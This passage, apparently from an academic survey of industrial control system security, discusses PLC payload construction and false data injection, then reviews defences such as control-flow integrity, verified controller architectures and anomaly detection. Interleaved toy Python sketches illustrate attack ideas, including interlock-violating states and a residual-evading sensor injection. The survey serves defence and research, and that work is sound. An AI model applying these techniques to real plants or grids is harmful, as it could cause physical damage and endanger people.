Here we introduce two new directions for attacks on ICSs. The first constructs payloads targeting an ICS that an adversary may not have full access to. The second class of attacks manipulates sensor inputs to misguide the decisions made by the PLCs.

1) Payload Construction: One type of attack aims to gather intelligence about the victim ICS. For example, the Duqu worm seems to have gathered information about victim systems [79] before relaying it to command and control servers. The other type of attack against ICS aims to influence the physical behavior of the victim system. The best-known example of such an attack is the Stuxnet worm, which manipulated the parameters of a set of centrifuges used for uranium enrichment. Such an attack has two stages: the compromise and the payload. Traditionally, once an adversary has compromised an information system, delivering a preconstructed payload is straightforward. This is because the attacker usually has a copy of the software being attacked. However, for ICSs, this is not necessarily the case.
Depending on the type of attack the adversary mounts, construction of the payload may be either error prone or nearly impossible. A payload is either indiscriminate or targeted.

An indiscriminate payload performs random attacks causing malicious actions within the machinery of a victim ICS. There are several ways malware can automatically construct indiscriminate payloads upon gaining access to one or more of the victim ICS PLCs [80]. The assumption here is that if the malware is able to write to the PLC code area, then it must also be able to read from the PLC code area.¹ Given the ability to read the PLC code, several methods may be used to construct indiscriminate payloads.

1) The malware infers basic safety properties known as interlocks [82] and generates a payload which sequentially violates as many safety properties as possible.

2) The malware identifies the main timing loop in the system. Consider the example of a traffic light, where the main loop ensures that each color of light is active in sequence for a specific period of time. The malware can then construct a payload that violates the timing loop, e.g., by allowing certain lights to overlap.

3) In the bus enumeration technique, the malware uses standardized identifiers such as Profibus IDs to find specific devices within a victim system [83].

While these indiscriminate payload construction methods are generic, they have a number of shortcomings. First, in the case where the payload is unaware of the actual devices in the victim ICS, one cannot guarantee that the resulting payload will cause damage (or achieve any other objective). Second, they cannot guarantee that the resulting payload will be stealthy. Thus, the malicious behavior may be discovered before it becomes problematic. Finally, there is no guarantee that a payload can be constructed at all.
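To make the interlock idea of method 1) concrete, the following is a toy sketch (all names hypothetical, not taken from [80]): a traffic-light interlock expressed as a safety predicate over controller outputs, and a brute-force search for output states that falsify it, mimicking a payload generator that enumerates safety violations.

```python
# Toy sketch: a traffic-light interlock as a safety predicate, and a
# search for output states that violate it (hypothetical names throughout).
from itertools import product

LIGHTS = ["ns_green", "ns_yellow", "ew_green", "ew_yellow"]

def interlock_ok(state):
    """Safety property: the north-south and east-west roads may never
    both show an active (green or yellow) signal at the same time."""
    ns_active = state["ns_green"] or state["ns_yellow"]
    ew_active = state["ew_green"] or state["ew_yellow"]
    return not (ns_active and ew_active)

# Enumerate all 2^4 output combinations and keep those that break the
# interlock, i.e., candidate indiscriminate-payload states.
violations = [
    dict(zip(LIGHTS, bits))
    for bits in product([False, True], repeat=len(LIGHTS))
    if not interlock_ok(dict(zip(LIGHTS, bits)))
]
# 3 active combinations per road, so 3 * 3 = 9 violating states.
```

Any of these nine states, if forced onto the PLC outputs, makes conflicting lights overlap, which is exactly the timing-loop violation described for method 2).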
If the malware is unable to infer safety properties, timing loops, or the types of physical machinery present, then it is not possible to construct a payload that exploits them.

A targeted payload, on the other hand, attempts to achieve a specific goal within the physical system, such as causing a specific device to operate beyond its safe limits. Constructing one is straightforward when the adversary is able to arbitrarily inspect the system under attack, i.e., when he has a copy of the exploited software. For autonomous, malware-driven attacks against ICS, this is not the case. Embedded controllers used in ICS may be air-gapped, meaning that once malware infects them, it may no longer be able to contact its command and control servers. Additionally, possessing the control logic for a given PLC may not be sufficient to analyze the system manually, as the assembly-language-like control logic does not reveal which physical devices are controlled by which program variables. Malware can nevertheless construct such a targeted payload against a compromised ICS [84]. This work assumes that the adversary launching the malware has imperfect knowledge about the physical machinery in the ICS, and is mostly aware of their interactions. However, the adversary lacks two key pieces of information: 1) the complete and precise behavior of the ICS; and 2) the mapping between the memory addresses of the victim PLC and the physical devices in the ICS. This mapping is important, as often the variable names in PLC code reveal nothing about the devices they control.

Assuming that the attacker can encode his limited knowledge of the victim plant into a temporal logic, a program analysis tool called SABOT can analyze the PLC code and map behaviors of the memory addresses in the code to those in the adversary's temporal logic description of the system.
The results show that by carefully constructing the temporal logic description of the system, the adversary can provide the malware with enough information to construct a targeted payload against most ICS devices.

These advances in payload generation defeat one of the main forms of security through obscurity: the inaccessibility and low-level nature of PLC code. The ability to generate a payload for a system without ever seeing its code represents a substantial lowering of the bar for ICS attackers, and thus should be a factor in any assessment methodology.

2) False Data Injection (FDI): In an FDI attack, the adversary selects a set of sensors that feed into one or more controllers. The adversary then supplies carefully crafted malicious values to these sensors, thus achieving a desired result from the controller. For example, if the supplied malicious values tell the controller that a temperature is becoming too low, it will increase the setting on a heating element, even if the actual temperature is fine. This will then lead to undetected overheating.

¹This assumption was confirmed in a study of PLC security measures placed as an ancillary section in an evaluation of a novel security mechanism [81]. The conclusion was that PLC access control policies are all or nothing, meaning that write access implies read access.

The earliest FDI attack targeted power system state estimation [85].
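The core trick behind this line of attack can be illustrated on a linear (dc) measurement model: an injection a = Hc lies in the column space of the measurement matrix H, so it shifts the least-squares state estimate by exactly c while leaving the residual used for bad-data detection unchanged. The following is a minimal numerical sketch with illustrative values only, not the grid model of [85].

```python
# Sketch of an undetectable FDI attack on linear (dc) state estimation:
# injecting a = H @ c shifts the estimate by c but leaves the bad-data
# detection residual untouched. Illustrative values only.
import numpy as np

rng = np.random.default_rng(0)
m, n = 8, 3                                   # 8 measurements, 3 state variables
H = rng.normal(size=(m, n))                   # measurement matrix (stand-in topology)
x_true = rng.normal(size=n)
z = H @ x_true + 0.01 * rng.normal(size=m)    # noisy measurements

def estimate(meas):
    """Least-squares state estimate and the residual norm that a
    threshold-based bad-data detector would inspect."""
    x_hat, *_ = np.linalg.lstsq(H, meas, rcond=None)
    return x_hat, np.linalg.norm(meas - H @ x_hat)

x_hat, r = estimate(z)

c = np.array([1.0, -2.0, 0.5])                # attacker's desired state shift
z_attacked = z + H @ c                        # a = Hc: lies consistent with the model
x_bad, r_attacked = estimate(z_attacked)

# The estimate moves by exactly c, yet the residual is identical, so a
# residual-threshold detector raises no alarm.
assert np.allclose(x_bad - x_hat, c)
assert np.isclose(r, r_attacked)
```

This also previews the defensive question raised below: detectors that only look at the residual are blind to any attack vector lying in the column space of H.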
State estimation is an important step in distributed control systems, where the actual physical state is estimated based on a number of observables. Power system state estimation determines how electric load is distributed across the various high-voltage lines and substations within the power transmission network. Compromising a subset of phasor measurement units (PMUs) can result in incorrect state estimation. This work addressed two questions: 1) Which sensors should be compromised, and how few are sufficient to achieve the desired result? 2) How can the maliciously crafted sensor values bypass the error correction mechanisms built into the state estimation algorithm? By compromising only tens of sensors (out of hundreds or thousands), it is possible to produce inaccurate state estimations in realistic power system bus topologies.

FDI attacks on Kalman-filtering-based state estimation have been reported in [86]. Kalman filters are a more general form of state estimation than the linear, direct current (dc) system model. The susceptibility of a Kalman-filter-based state estimator to FDI attacks depends on inherent properties of the designed system [86]. The system is only guaranteed to be controllable via an FDI attack if the underlying state transition matrix contains an unstable eigenvalue, among other conditions. This has important implications not only for attacks but also for defenses against FDI attacks, since a system lacking an unstable eigenvalue may not be perfectly attacked.

IV. MITIGATING ATTACKS ON ICSs

In this section, we review the following ICS defenses: software-based mitigation, secure controller architectures to detect intrusions, and theoretical frameworks to understand the limits of mitigation.

A. Software Mitigations

Embedded systems software is programmed using native (unsafe) programming languages such as C or assembly language. As a consequence, it suffers from memory exploits, such as buffer overflows.
After gaining control over the program flow, the adversary can inject malicious code to be executed (code injection [87]), or use existing pieces (gadgets) that already reside in program memory (e.g., in linked libraries) to implement the desired malicious functionality (return-oriented programming [88]). Moreover, return-oriented programming is Turing complete, i.e., it allows an attacker to execute arbitrary malicious code. The latter attacks are often referred to as code-reuse attacks since they use benign code of existing ICS software. Code-reuse attacks are prevalent and are applicable to a wide range of computing platforms. Stuxnet is known to have used code-reuse attacks [89].

Defenses against these attacks focus on either enforcing control-flow integrity (CFI) or randomizing the memory layout of an application by means of fine-grained code randomization. We elaborate on these two defenses. These defenses assume an adversary who is able to overwrite control-flow information in the data area of an application. There is a large body of work that prevents this initial overwrite; a discussion of these approaches is beyond the scope of this paper.

1) Control-Flow Integrity: This defense technique against code reuse ensures that an application only executes according to a predetermined control-flow graph (CFG) [90]. Since code injection and return-oriented programming result in a deviation from the CFG, CFI detects and prevents the attack. CFI can be realized as a compiler extension [91] or as a binary rewriting module [90]. CFI has performance overhead caused by control-flow validation instructions. To reduce this overhead, a number of proposals have been made: kBouncer [92], ROPecker [93], CFI for COTS binaries [94], ROPGuard [95], and CCFIR [96].
These schemes enforce so-called coarse-grained integrity checks to improve performance. For instance, they only constrain function returns to instructions following a call instruction, rather than checking the return address against a list of valid return addresses held on a shadow stack. Unfortunately, this tradeoff between security and performance allows for advanced code-reuse attacks that stitch together gadgets from call-preceded sequences [97]-[100]. Some runtime CFI techniques leverage low-level hardware events [101]-[103]. Another host-based CFI check injects intrusion detection functionality into the monitored program [104].

Until now, the majority of research on CFI has focused on software-based solutions. However, hardware-based CFI approaches are more efficient. Further, dedicated hardware CFI instructions allow for system-wide CFI protection using these instructions. The first hardware-based CFI approach [105] realized the original CFI proposal [90] as a CFI state machine in a simulation environment of the Alpha processor. HAFIX proposes hardware-based CFI instructions and has been implemented on real hardware targeting Intel Siskiyou Peak and SPARC [106], [107]. It generates 2% performance overhead across different embedded benchmarks by focusing on preventing return-oriented programming attacks exploiting function returns.

Remaining Challenges: Most proposed CFI defenses focus on the detection and prevention of return-oriented programming attacks, but do not protect against return-into-libc attacks. This is only natural, because the majority of code-reuse attacks require a few
return-oriented gadgets to initialize registers and prepare memory before calling a system call or critical function. However, Schuster et al. [108] have demonstrated that code-reuse attacks based on only calling a chain of virtual methods allow arbitrary malicious program actions. In addition, it has been demonstrated that pure return-into-libc attacks can achieve Turing completeness [109]. Detecting such attacks is challenging: modern programs link to a large number of libraries, and require dangerous API and system calls to operate correctly [97]. Hence, for these programs, dangerous API and system calls are legitimate control-flow targets for indirect and direct call instructions, even if fine-grained CFI policies are enforced. In order to detect code-reuse attacks that exploit these functions, CFI needs to be combined with additional security checks, e.g., dynamic taint analysis and techniques that perform argument validation. Developing such CFI extensions is an important future research direction.

2) Fine-Grained Code Randomization: A widely deployed countermeasure against code-reuse attacks is the randomization of the application's memory layout. The key idea here is one of software diversity [110]. The key observation is that an adversary typically attempts to compromise many systems using the same attack vector. To mitigate this attack, one can diversify a program implementation into multiple and different semantically equivalent instances [110]. The goal is to force the adversary to tailor the attack vector for each software instance, making the attack prohibitive. Different approaches can be taken for realizing software diversity, e.g., memory randomization [111], [112], based on a compiler [110], [113], [114], or by binary rewriting and instrumentation [115]-[118].
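The distinction drawn earlier between precise shadow-stack checking and coarse-grained call-preceded policies can be illustrated with a toy sketch. The addresses and the simulation itself are our own constructions, not taken from any cited system:

```python
class ShadowStack:
    """Fine-grained policy: a return must match the exact saved return address."""
    def __init__(self):
        self._stack = []
    def on_call(self, return_addr):
        self._stack.append(return_addr)
    def on_return(self, target):
        return bool(self._stack) and self._stack.pop() == target

def coarse_check(target, call_preceded):
    """Coarse-grained policy: any call-preceded address is an allowed return target."""
    return target in call_preceded

# Two call sites in a toy program; both return addresses are call-preceded.
CALL_PRECEDED = {0x401010, 0x402020}

def attempt_return(target):
    """Simulate one call made from site 0x401010, then a return to `target`.
    Returns (coarse_policy_verdict, shadow_stack_verdict)."""
    shadow = ShadowStack()
    shadow.on_call(0x401010)
    return coarse_check(target, CALL_PRECEDED), shadow.on_return(target)

print(attempt_return(0x401010))  # legitimate return to the saved address
print(attempt_return(0x402020))  # ROP-style pivot to the *other* call site
```

The hijacked return to the other call site satisfies the coarse-grained policy (the target is call-preceded) but fails the shadow-stack check, which is exactly the gap that call-preceded gadget-stitching attacks exploit.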
A well-known instance of code randomization is address space layout randomization (ASLR), which randomizes the base address of shared libraries and the main executable [112]. Unfortunately, ASLR is often bypassed in practice due to its low randomization entropy and memory disclosure attacks which enable prediction of code locations. To tackle this limitation, a number of fine-grained ASLR schemes have been proposed [115]-[120]. The underlying idea is to randomize the code structure, for instance, by shuffling functions, basic blocks, or instructions (ideally for each program run [117], [118]). With fine-grained ASLR enabled, an adversary cannot reliably determine the addresses of interesting gadgets based on disclosing a single runtime address.

However, a recent just-in-time return-oriented programming (JIT-ROP) attack circumvents fine-grained ASLR by finding gadgets and generating the return-oriented payload on the fly [121]. As for any other real-world code-reuse attack, it only requires a memory disclosure of a single runtime address. However, unlike code-reuse attacks against ASLR, JIT-ROP only requires the runtime address of a valid code pointer, without knowing to which precise code part or function it points. Hence, JIT-ROP can use any code pointer, such as return addresses on the stack, to instantiate the attack. Based on the leaked address, JIT-ROP can disclose the content of multiple memory pages, and generates the return-oriented payload at runtime. The key insight of JIT-ROP is that a leaked code pointer will reside on a 4-kB aligned memory page. This can be exploited by leveraging a scripting engine (e.g., JavaScript) to determine the affected page's start and end address. Afterwards, the attacker can start disassembling the randomized code page from its start address, and identify useful return-oriented gadgets. To tackle this class of code-reuse attacks, defenses have been proposed [122]-[124].
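The effect of fine-grained layout randomization on a precomputed gadget address can be sketched as follows. The block names, sizes, and per-run shuffle are our own toy model, not any cited scheme:

```python
import random

BLOCKS = ["prologue", "gadget_pop_rdi", "crypto", "gadget_syscall", "epilogue"]

def load_image(seed, base=0x400000, block_size=0x10):
    """Toy fine-grained 'ASLR': shuffle code-block order (and the image base)
    per program instance, so gadget addresses differ from run to run."""
    rng = random.Random(seed)
    order = BLOCKS[:]
    rng.shuffle(order)                        # fine-grained: reorder blocks
    base += rng.randrange(0, 0x1000, 0x10)    # plus coarse base randomization
    return {name: base + i * block_size for i, name in enumerate(order)}

run_a = load_image(seed=1)
run_b = load_image(seed=2)

# A payload that hardcodes run_a's gadget address will usually miss in run_b,
# and leaking one address in run_b no longer fixes the others' relative offsets.
print(run_a["gadget_syscall"], run_b["gadget_syscall"])
```

This is why a single disclosed pointer is not enough against fine-grained schemes, and why JIT-ROP instead reads and disassembles whole pages at runtime to rediscover gadgets in the shuffled layout.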
Readactor leverages a hardware-based approach to enable execute-only memory [124]. For this, it exploits Intel's extended page tables to conveniently mark memory pages as execute-only. In addition, an LLVM-based instrumented compiler 1) permutes functions; 2) strictly separates code from data; and 3) hides code pointers. As a consequence, a JIT-ROP attacker can no longer disassemble a page (i.e., the code pages are set to nonreadable). In addition, one cannot abuse code pointers located on the application's stack and heap to identify return-oriented gadgets, since Readactor performs code pointer hiding.

Remaining Challenges: CFI provides provable security [125]. That is, one can formally verify that CFI enforcement is sound. In particular, the explicit control-flow checks inserted by CFI into an application provide strong assurance that a program's control flow cannot be arbitrarily hijacked by an adversary. In contrast, code randomization does not put any restriction on the program's control flow. In fact, the attacker can provide any valid memory address as an indirect branch target. Another related problem of protection schemes based on code randomization is side-channel attacks [126], [127]. These attacks exploit timing and fault analysis side channels to infer randomization information. Recently, several defenses have started to combine CFI with code randomization. For instance, Mohan et al. [128] presented opaque CFI (O-CFI). This solution leverages coarse-grained CFI checks and code randomization to prevent return-oriented exploits. For this, O-CFI identifies a unique set of possible target addresses for each indirect branch instruction. Afterwards, it uses the per-indirect-branch set to restrict the target address of the indirect branch to only its minimal and maximal members.
To further reduce the set of possible addresses, it arranges basic blocks belonging to an indirect branch set into clusters (so that they are located near each other), and also randomizes their location. However, O-CFI relies on precise static analysis. In particular, it statically determines valid branch addresses for return instructions, which typically leads to coarse-grained policies. Nevertheless, Mohan et al. [128] demonstrate that combining CFI with code randomization is a promising research direction.

B. Novel/Secure Control Architectures

In this section, we consider mitigations for the problem raised in Section III-B1. The threat here is that an adversary may tamper with a controller's logic code, thus subverting its behavior. This can be generalized to the notion of an untrusted controller. We consider four novel architectures for this problem: TSV, a tool for statically checking controller code; C2, a dynamic reference monitor for a running controller; S3A, a controller architecture that represents a middle ground between TSV and C2; and finally, an approach for providing a trusted computing base (TCB) for a controller so that PLCs may dependably enforce safety properties on themselves.

1) Trusted Safety Verifier (TSV) [81]: As previously discussed, one method for tampering with an ICS process is to upload malicious logic to a PLC. This was demonstrated by the Stuxnet attack. TSV prevents uploading of malicious control logic by statically verifying that logic a priori [81].
TSV sits on an embedded device next to a PLC and intercepts all PLC-bound code, statically verifying it against a set of designer-supplied safety properties. TSV does this in a number of steps. First, the control logic is symbolically executed to produce a symbolic scan cycle. A symbolic scan cycle represents all possible single-scan-cycle executions of the control logic. It then finds feasible transitions between subsequent symbolic scan cycles to form a temporal execution graph (TEG). The TEG is then fed into a model checker which will verify that a set of linear temporal logic safety properties hold under the TEG model. If the control logic violates any safety property, the model checker will return a counterexample input that would cause the violation, and the control logic will be blocked from running on the PLC. The main drawback of TSV is that often the TEG is a tree structure of bounded depth. Thus, systems beyond a certain complexity cannot be effectively checked by TSV in a reasonable amount of time.

2) C2 Architecture [129]: It provides a dynamic reference monitor for sequential and hybrid control systems. Like TSV, C2 enforces a set of engineer-supplied safety properties. However, enforcement in C2 is done at runtime, by an external module positioned between a PLC and the ICS hardware devices. At the end of each PLC scan cycle, a new set of control signals is sent to the ICS devices. C2 will check these signals, along with the current ICS state, against the safety properties. Any unsafe modifications of the plant state are denied. If at any step an attempted control signal is denied by C2, it will enact one of a number of deny disciplines to deal with the potentially dangerous operation. One of the main results from the C2 evaluation was that all deny disciplines should support notifying the PLC of the denial, so that it knows the plant did not receive the control signal.
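The per-scan-cycle checking that C2 performs can be sketched as a small reference monitor. The tank process, property names, and limits below are hypothetical, invented purely for illustration:

```python
def make_monitor(safety_props):
    """C2-style reference monitor: vet the control signals emitted at the end of
    a scan cycle against safety predicates before they reach the plant; on a
    denial, report the violated properties back so the PLC knows."""
    def check(state, signals):
        violations = [name for name, prop in safety_props.items()
                      if not prop(state, signals)]
        if violations:
            return {"delivered": False, "notify_plc": violations}
        return {"delivered": True, "notify_plc": []}
    return check

# Hypothetical tank process: never open the drain while the heater is on, and
# never heat when the level is below 10 (names and limits are our invention).
props = {
    "no_drain_while_heating": lambda s, c: not (c["drain"] and c["heater"]),
    "no_dry_heating": lambda s, c: not (c["heater"] and s["level"] < 10),
}
monitor = make_monitor(props)

ok = monitor({"level": 50}, {"drain": False, "heater": True})   # delivered
bad = monitor({"level": 5}, {"drain": True, "heater": True})    # denied, PLC told
print(ok, bad)
```

Returning the violated property names models the deny-discipline lesson from the C2 evaluation: the PLC must learn that the plant never received the signal.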
A key shortcoming of C2 is that it can only detect violations immediately before they occur. What is preferable is a system that can give advance warnings, like TSV's static analysis, but that can work for complex ICS, like C2.

3) Secure System Simplex Architecture (S3A) [130]: Similar to how TSV requires a copy of the control logic, S3A requires the high-level system control flow and execution time profiles for the system under observation. Similar to how C2 performs real-time monitoring, S3A aims to detect when the system is approaching an unsafe state. However, different from C2, S3A aims to give a deterministic time buffer before potentially entering the unsafe state [131]. While S3A has the advantage of more advanced detection, it cannot operate on arbitrarily complex systems like C2 can. However, it is appropriate for more complex systems than TSV.

Remaining Challenges: In this review of TSV, C2, and S3A, we see a tradeoff forming: complexity of the monitored system versus amount of advance warning. TSV sits at one end of this spectrum, offering the most advance warning for systems of bounded complexity, while C2 sits at the other end, offering last-second detection of unsafe states on arbitrarily complex systems. The S3A approach represents a compromise between the two; however, the more complex the system is, the more detailed the control flow and timing information fed to S3A must be. In the future, computational power for verification may be substantial enough to allow for full TSV analysis of arbitrarily complex systems; for current, practical solutions, however, this is not a reasonable assumption.

Part of the reason none of the existing architectures can win both ends of the tradeoff is that they all exist outside the PLC. This also adds significant cost and complexity, as they must be physically integrated with an existing control system.
An alternative approach is to construct future PLCs to provide a minimal trusted computing base (TCB). One such TCB, with the goal of restricting the ability to manipulate physical machinery to a small set of privileged code blocks within the PLC memory, is proposed in [132]. This TCB is not itself aware of the ICS physical safety properties. Instead, the goal of this TCB is to protect a privileged set of code blocks that are able to affect the plant, i.e., via control signals. The privileged code blocks then contain the safety properties. Thus, C2- or S3A-like checks are done from within these blocks. This approach has the added benefit that a TSV-like verification of safety properties in the privileged blocks is substantially simpler than verifying an entire system, thus allowing for a static analysis of more complex systems than TSV.

C. Detection of Control and Sensor Injection Attacks

When considering attacks against ICS, there are two important channels that must be considered: the control channel and the sensor channel. A control channel attack compromises a computer, a controller, or an individual upstream from the physical process. The compromised entity then injects malicious commands into the system. A sensor channel attack corrupts sensor readings coming from the physical plant in order to cause bad decision making by the controllers receiving those sensor readings.2 In this section, we review detection of control channel attacks and FDI.
Techniques for control channel attacks inherit from the existing body of work in network and host intrusion detection, whereas FDI detection stems largely from the theory of state estimation and control.

1) Detecting Control Channel Attacks: A survey of SCADA intrusion detection between 2004 and 2008 can be found in [133]. It presents a taxonomy in which detection systems are categorized based on the following.

Degree of SCADA specificity: How well does the solution leverage some of the unique aspects of SCADA systems?
Domain: Does the solution apply to any SCADA system, or is it restricted to a single domain, e.g., water?
Detection principle: What method is used to categorize events: behavioral, specification, anomaly, or a combination?
Intrusion-specific: Does the solution only address intrusions, or is it also useful for fault detection?
Time of detection: Is the threat detected and reported in real time, or only as an offline operation?
Unit of analysis: Does the solution examine network packets, API calls, or other events?

We find that among the categorized systems there are some deficiencies. First, they lack a well-defined threat model. Second, they do not account for the degree of heterogeneity found in real-world ICS, e.g., use of multiple protocols. Finally, the proposed systems were not sufficiently evaluated for false positives, and insufficient strategies for dealing with false positives were given.

We review recent work that aims at greater feasibility [134]. In this approach, a specification is derived for traffic behavior over smart meter networks, and formal verification is used to ensure that any network trace conforming to the specification will not violate a given security policy.
The specification is formed based on: 1) the smart meter protocols (in this case, the ANSI C12 family); 2) a system model consisting of state machines that describe a meter's lifetime, e.g., provisioning, normal operation, error conditions, etc., as well as the network topology; and 3) a set of constraints on allowed behavior. An evaluation of a prototype implementation showed that no more than 1.6% of CPU usage was needed for monitoring the specification at meters. One potential limitation of this approach is the need for expert-provided information in the form of the system model and constraints on allowed behavior.

An alternative approach, which is not dependent on specifications, is given in [135]. This solution builds a model of good behavior through observation of three types of quantities visible to PLCs: sensor measurements, control signals, and events such as alarms. The behavioral model uses autoregression to predict the next system state. To avoid low-and-slow attacks that autoregression may not catch, upper and lower Shewhart control limits are used as absolute bounds on process variables that may not be crossed. Their evaluation on one week of network traces from a prototype control system showed that most normal behaviors were properly modeled by the autoregression. There were, however, several causes of deviations, including nearly constant signals that occasionally deviated briefly before returning to their prior constant value, and a counter variable that experienced a delayed increment. Such cases would represent false positives for the autoregression model, but would not necessarily trip the Shewhart control limits.

2) Detecting FDI: While control channel attacks directly target controllers with malicious commands, FDI attacks can be more subtle, as they use forged sensor data to cause the controller to make misguided decisions. Detection of FDI attacks is thus deeply rooted in the existing discipline of state estimation discussed earlier.
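The two-layer detection idea of [135] above, an autoregressive model of learned behavior backed by absolute Shewhart-style control limits, can be sketched with toy data. The AR(1) model, tolerances, and series below are our own illustrative choices:

```python
def fit_ar1(series):
    """Least-squares AR(1) fit: x[t+1] ~ a * x[t] + b."""
    xs, ys = series[:-1], series[1:]
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    var = sum((x - mx) ** 2 for x in xs)
    a = cov / var if var else 0.0
    return a, my - a * mx

def detect(series, a, b, resid_tol, low, high):
    """Alarm when the AR(1) residual is large (behavioral layer) or the value
    leaves the absolute [low, high] control limits (Shewhart-style layer)."""
    alarms = []
    for t in range(1, len(series)):
        pred = a * series[t - 1] + b
        if abs(series[t] - pred) > resid_tol or not (low <= series[t] <= high):
            alarms.append(t)
    return alarms

# Train on a week of 'normal' process values (toy numbers).
normal = [50.0, 50.5, 50.2, 50.4, 50.1, 50.3, 50.2, 50.4]
a, b = fit_ar1(normal)

# A sudden forged spike: the AR residual flags it, and it also breaches the
# absolute limits that would catch a slow drift the AR model might track.
spike = normal + [80.0]
print(detect(spike, a, b, resid_tol=2.0, low=40.0, high=60.0))
```

On the quiet training data no point alarms, while the appended spike trips both layers; a low-and-slow ramp that stays within the residual tolerance would still eventually cross the absolute limits, which is the rationale for keeping both checks.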
This will require a) a measurement model that relates the measured quantity to the physical value that caused it, i.e., heat propagation; and b) an error detection method to allow for faulty measurements to be discarded.

We described one attack against power grid state estimation in which estimation errors could be caused by tampering with a relatively small number of PMUs [85]. In one approach to detecting such an attack, one can use a small, strategically selected set of tamper-resistant meters to provide independent measurements [136]. These out-of-band measurements are used to determine the accuracy of the remaining majority of measurements contributing to the state estimation.

In a second approach [137], two security indices are computed for a given state estimator. The first index measures how well the state estimator's bad data detector can handle attacks where the adversary is limited to a few tampered measurements. The second index measures how well the bad data detector can handle attacks where the adversary only makes small changes to measurement magnitudes. Along with the grid topology information, these indices can be useful in determining how to allocate security functionality, such as retrofitted encryption, to various measurement devices.

The third approach differs from the above two in that it does not attempt to select a set of meters for security enhancements, but instead places weights on the grid topology to reflect the trustworthiness of various PMUs [138].

2More information about FDI can be found in Section III-B2.
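The trust-weighting idea can be sketched as weighted fusion of redundant measurements. This is only a crude stand-in for the trust-weighted distributed Kalman filtering of [138]; the readings and weights are invented here:

```python
def weighted_estimate(readings, trust):
    """Trust-weighted fusion of redundant measurements of one scalar state:
    x_hat = sum(w_i * z_i) / sum(w_i). Low-trust meters pull the estimate less."""
    total = sum(trust)
    return sum(w * z for w, z in zip(trust, readings)) / total

readings = [100.1, 99.9, 140.0]   # third PMU reports a tampered value

naive = weighted_estimate(readings, [1.0, 1.0, 1.0])    # equal trust: skewed
wary = weighted_estimate(readings, [1.0, 1.0, 0.05])    # low trust in meter 3
print(naive, wary)
```

Down-weighting the suspect meter pulls the estimate back toward the honest readings, which is the qualitative effect the trust-weighted filter aims for.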
The trust weights are integrated into a distributed Kalman filtering algorithm to produce a state estimation that more accurately reflects the trustworthiness of the individual PMUs. In the evaluation of the distributed Kalman filters, it was found that they converged to the correct state estimate in approximately 20 steps. From these approaches to detecting both control channel and FDI attacks, one can see that an effective method toward detecting ICS intrusions involves monitoring the physical process itself, as well as its interactions with the controller and sensors.

D. Theoretical ICS Security Frameworks

A number of recent advances have generalized the increasing body of results to provide theoretical frameworks. In this section, we will review such theoretical frameworks based on the following three approaches: 1) modeling attacker behavior and identifying likely attack scenarios; 2) defining the general detection and identification of attacks against ICS; and 3) the distribution of security enhancements in ICSs where controllers share network infrastructure. A common theme in these frameworks is the optimal distribution of security protections in large, legacy ICSs.

Adding protections like cryptographic communications to legacy equipment is expensive. Thus, it is preferable to secure the most vulnerable portions of an ICS. Teixeira et al. describe a risk management framework for ICSs [139]. Starting with the notion of security indices [137], this work looks at methods for identifying the most vulnerable measurements in both static and dynamic control systems. For static control systems, it is assumed that adversaries wish to execute the minimum cost attack. In the static case, the α_k index described in Section IV-C is sufficient, and methods are given for efficiently computing α_k for large systems. In the case of dynamic systems, the maximum-impact, minimum-resource attacks are defined as a multiobjective optimization problem.
For such a problem, the basic security indices do not suffice. Instead, the multiobjective problem is transformed into a maximum-impact, resource-constrained problem. An example is given where this is used to calculate the attack vectors for a quadruple-tank system. The resulting optimal attack strategy can be used to allocate defenses such as data encryption in the ICS.

Another framework considers generalizing attacks against ICSs and describes the fundamental limitations of monitors against these attacks [140]. Assuming that an attack monitor is consistent, i.e., does not generate false positives, it is shown that some attacks are undetectable if there is an initial state which produces the same final state as an attack. Additionally, it is shown that some attacks cannot be distinguished from others. These results are applicable to stealthy [141], replay [142], and FDI attacks.

The previous two approaches considered ways of modeling attacks and attack likelihoods against individual control loops. However, in some systems, a number of otherwise independent control processes are actually somewhat dependent due to the shared network. In this case, a distributed denial of service (DDoS) attack against one controller may affect others. The problem of interdependent control systems is addressed using a game-theoretic approach in [143]. The noncooperative game consists of two stages: 1) each control loop (player) chooses whether to apply security enhancements; and 2) each player applies the optimal control input to its plant.

In the nonsocial form of this game, players only attempt to minimize their own cost, which consists of the operating costs of the plant plus the cost of adding and maintaining security measures. For this form of the game, with M players, there is shown to exist a unique equilibrium solution. The solutions to this game may not be globally optimal, due to externalities imposed by players that opt out of security enhancements.
To solve this, penalties are introduced for players that do not select security enhancements, leading to a guaranteed unique solution that is also globally optimal. While such a game-theoretic approach is useful in distributing the cost of security enhancements, actually achieving robust control in distributed systems is more difficult, especially when the system in question is nonlinear. To this end, a modification to a traditional model-predictive control (MPC) problem has been suggested [144]. Adding a robustness constraint to the MPC problem can bound the values of future states.

These theoretical frameworks offer opportunities to understand and improve defenses. However, it is important to understand the assumptions behind the frameworks. For example, the above approaches assume the following.
1) Attackers are omniscient, knowing the exact measurement, control, and process matrices for each system, as well as all system states.
2) Attackers are nearly omnipotent, with the ability to compromise any measurement and control vector. There is an important exception here, which is that detectors are assumed to be immune to attackers.
3) Detectors do not create false positives and systems are completely deterministic (first two approaches).
4) Security enhancements can significantly mitigate DDoS attacks on various network architectures (third approach).

In any assessment procedure, the actual set of assumptions should be considered and compared with those of the theoretical framework being used in the assessment.

V. CONCLUSION

ICT-based ICS can deliver real-time information, resulting in automatic and intelligent control of industrial processes.
Inherently dangerous processes, however, are no longer immune to cyber threats, as vulnerable devices, formats, and protocols are not hosted on dedicated infrastructure due to cost pressures. Consequently, ICS infrastructure has become increasingly exposed, either by direct connection to the Internet, or via interfaces to utility IT systems. Therefore, inflicting substantial damage or widespread disruption may be possible with a comprehensive analysis of the target systems. Publicly available information, combined with default and well-known ICS configuration details, could potentially allow a resource-rich adversary to mount a large-scale attack.

This paper surveyed the state of the art in ICS security, identified outstanding research challenges in this emerging area, and motivated the deployment of cybersecurity methods and tools to ICS. All levels of the multilayered ICS architecture can be targeted by sophisticated cyberattacks that disturb the control process of the ICS. Assessing the vulnerabilities of ICS requires the development of a uniquely-ICS multilayered testbed that establishes as many pathways as possible between the cyber and physical components in the ICS. These pathways can assist in determining the real-world consequences in terms of the technical impacts and the severity of the outcomes. An important direction of research is to develop effective methods to detect ICS intrusions that involve monitoring the physical processes themselves, as well as their interactions with the controller and sensors.

Acknowledgment

